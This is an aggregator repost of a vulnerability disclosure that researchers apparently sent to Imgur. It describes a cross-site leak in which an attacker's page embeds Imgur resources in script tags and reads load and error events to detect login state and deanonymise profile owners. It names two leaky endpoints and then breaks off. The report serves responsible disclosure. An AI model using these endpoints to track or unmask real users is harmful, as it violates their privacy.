📚 Imgur: De-anonymization Attack: Cross Site Information Leakage
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vulners.com
Dear Imgur Security Team, We are researchers at the IMDEA Software Institute in Madrid, Spain. We have been working on analyzing Cross-Site Browser Leaks (xsleaks) and building a tool for finding instances of it on target web sites. Recently we tested imgur.com and discovered a flaw that can affect Imgur users. We would like to responsibly disclose it and support you to mitigate the issue. The details follow. Attack Overview: Events-Fired xsLeak: a cross-domain attack website, say attacker.org, could embed specific resources from imgur.com in a script Tag, and check if an error or load event is triggered in one state but not in the other. Based on which events are triggered for each vulnerable resource, the attacker can infer the victim state (e.g. logged in vs logged out, or owner of a specific profile). This happens because the leaky endpoint return a 2xx HTTP response in one state but a 4xx in the other. In particular, we have found 2 vulnerable (leaky) endpoints: The first one can be used for login detection (onerror = logged out, onload = logged in):https://api.imgur.com/3/larynx/history?IMGURPLATFORM=web&IMGURUIDJAFO=9d77969d8b3a7a6ac6cb78943c96e48cd0bd74e02b29839f9f19aea827429db6&SESSIONCOUNT=3&client_id=546c25a59c58ad7 2. The second one can be used to track and deanonymize the owner of a Imgur profile across origins. For this, the attacker leverages the resource: https://.imgur.com/all where is the username of the victim to be fingerprinted... ...